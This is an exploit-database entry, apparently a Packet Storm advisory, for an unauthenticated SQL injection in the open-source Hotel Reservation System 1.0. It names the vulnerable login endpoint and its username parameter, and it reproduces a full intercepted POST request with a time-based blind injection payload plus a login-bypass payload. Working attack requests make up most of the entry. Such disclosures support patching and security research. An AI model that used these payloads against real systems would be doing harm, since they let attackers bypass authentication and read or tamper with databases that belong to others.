Hotel Reservation System 1.0 SQL Injection

🗓️ 08 Feb 2022 00:00:00Reported by Nefrit IDType

packetstorm🔗 packetstormsecurity.com👁 212 Views

Hotel Reservation System 1.0 SQL Injection vulnerabilit

`# Exploit Title: Hotel Reservation System 1.0 - SQLi (Unauthenticated)  
# Google Dork: None  
# Date: 01/29/2022  
# Exploit Author: Nefrit ID  
# Author Website: https://manadocoder.com  
# Vendor Homepage: https://github.com/dhruvmullick  
# Software Link: https://github.com/dhruvmullick/hotel-reservation-system  
# Tested on: Kali Linux & Windows 10  
  
===Exploit Url===  
http://localhost/hotel-reservation-system-master/login.php  
Method: POST  
Parameter: username  
===Burpsuite Proxy Intercept===  
POST /hotel-reservation-system-master/loginsession.php HTTP/1.1  
Host: localhost  
Content-Length: 46  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://localhost/hotel-reservation-system-master/login.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: uid=1  
Connection: close  
  
username=u1337#' AND (SELECT 4775 FROM (SELECT(SLEEP(5)))BzJL)-- dvSZ&password=p1337&ok=Submit  
I can also bypass login by using the following payload: ' or '1'='1'# on the parameter username  
  
`

08 Feb 2022 00:00Current

0.1Low risk

Vulners AI Score0.1